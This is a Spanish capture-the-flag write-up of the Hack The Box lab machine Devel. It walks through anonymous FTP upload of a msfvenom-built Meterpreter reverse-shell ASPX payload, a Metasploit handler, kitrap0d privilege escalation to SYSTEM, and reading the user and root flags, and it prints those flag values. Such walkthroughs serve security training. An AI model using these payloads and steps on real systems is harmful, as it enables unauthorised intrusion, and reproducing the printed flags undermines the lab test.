[HTB] Devel

Hoy vamos a hackear la maquina de HTB llamada Devel.

Video


Enumeration


Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 12:35 CEST
Nmap scan report for 10.10.10.5
Host is up (0.037s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM                  aspnet_client
| 04-05-20  09:33PM                 2854 go.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds
Nos podemos conectar por FTP anonimamente, y vemos que el contenido del FTP es lo que se muestra en el servidor IIS (Web), asi que utilizamos msfvenom para generarnos un meterpreter/reverse_tcp en .aspx y subirlo al FTP.

Exploitation



sml@Cassandra:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 
LPORT=6666 -f aspx -o go.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the 
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2818 bytes
Saved as: go.aspx
Subimos al FTP nuestro .aspx

sml@Cassandra:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:sml): anonymous                                
331 Anonymous access allowed, send identity (e-mail name) as password.          
                                                       
Password:                                                         
230 User logged in.                                                
Remote system type is Windows_NT.                                   
ftp> put go.aspx                                                     
local: go.aspx remote: go.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2854 bytes sent in 0.00 secs (18.5156 MB/s)
ftp>
Preparamos el handler en nuestra maquina para dejarlo a la escucha.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.19
lhost => 10.10.14.19
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.19:6666
Visitamos http://10.10.10.5/go.aspx para obtener la shell.

[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49196) at 
2020-04-02 12:38:29 +0200

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > shell
Process 1280 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Privilege Escalation


Ahora que tenemos una session abierta, vamos a utilizar post/multi/recon/local_exploit_suggester para encontrar algun exploit que nos permita elevar los privilegios.

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears 
to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is 
running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears 
to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears 
to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_
    The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_
      The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image : The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
De todos los posibles, elegimos ms10_015_kitrap0d.

msf5 post(multi/recon/local_exploit_suggester) > use 
exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.1.148:4444 
[*] Launching notepad to host the exploit...
[+] Process 620 launched.
[*] Reflectively injecting the exploit DLL into 620...
[*] Injecting exploit into 620 ...
[*] Exploit injected. Injecting payload into 620...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to 
complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User             Path
 ---   ----  ----                    ----  -------  ----             ----
 0     0     [System Process]                                        
 4     0     System                                                  
 264   4     smss.exe                                                
 324   488   dllhost.exe                                             
 344   336   csrss.exe                                               
 384   336   wininit.exe                                             
 396   376   csrss.exe                                               
 452   376   winlogon.exe                                            
 488   384   services.exe                                            
 496   384   lsass.exe                                               
 504   384   lsm.exe                                                 
 608   488   svchost.exe                                             
 620   3532  notepad.exe             x86   0                         
C:\Windows\system32\notepad.exe
 672   488   svchost.exe                                             
 724   488   svchost.exe                                             
 796   452   LogonUI.exe                                             
 832   488   svchost.exe                                             
 888   488   svchost.exe                                             
 1000  488   svchost.exe                                             
 1092  488   svchost.exe                                             
 1180  488   spoolsv.exe                                             
 1216  488   svchost.exe                                             
 1316  488   svchost.exe                                             
 1384  488   svchost.exe                                             
 1424  488   svchost.exe                                             
 1512  488   VGAuthService.exe                                       
 1520  488   msdtc.exe                                               
 1540  488   vmtoolsd.exe                                            
 1568  488   svchost.exe                                             
 2020  608   WmiPrvSE.exe                                            
 2084  608   WmiPrvSE.exe                                            
 2780  488   sppsvc.exe                                              
 2812  488   svchost.exe                                             
 2892  488   SearchIndexer.exe                                       
 3044  2892  SearchProtocolHost.exe                                  
 3316  488   WmiApSrv.exe                                            
 3532  1568  w3wp.exe                x86   0        IIS APPPOOL\Web  
c:\windows\system32\inetsrv\w3wp.exe

meterpreter > migrate 620
[*] Migrating from 3532 to 620...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

user.txt



c:\Users>cd babis
c:\Users\babis>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis

17/03/2017  05:17                .
17/03/2017  05:17                ..
17/03/2017  05:17                Contacts
18/03/2017  02:14                Desktop
17/03/2017  05:17                Documents
17/03/2017  05:17                Downloads
17/03/2017  05:17                Favorites
17/03/2017  05:17                Links
17/03/2017  05:17                Music
17/03/2017  05:17                Pictures
17/03/2017  05:17                Saved Games
17/03/2017  05:17                Searches
17/03/2017  05:17                Videos
               0 File(s)              0 bytes
              13 Dir(s)  24.383.025.152 bytes free

c:\Users\babis>cd Desktop
c:\Users\babis\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  02:14                .
18/03/2017  02:14                ..
18/03/2017  02:18                 32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.383.025.152 bytes free

c:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

root.txt



c:\Users>cd administrator
c:\Users\Administrator>dir

 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator

18/03/2017  02:16                .
18/03/2017  02:16                ..
18/03/2017  02:16                Contacts
18/03/2017  02:17                Desktop
18/03/2017  02:16                Documents
18/03/2017  02:16                Downloads
18/03/2017  02:16                Favorites
18/03/2017  02:16                Links
18/03/2017  02:16                Music
18/03/2017  02:16                Pictures
18/03/2017  02:16                Saved Games
18/03/2017  02:16                Searches
18/03/2017  02:16                Videos
               0 File(s)              0 bytes
              13 Dir(s)  24.383.737.856 bytes free

c:\Users\Administrator>cd Desktop
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  02:17                .
18/03/2017  02:17                ..
18/03/2017  02:17                 32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.383.737.856 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".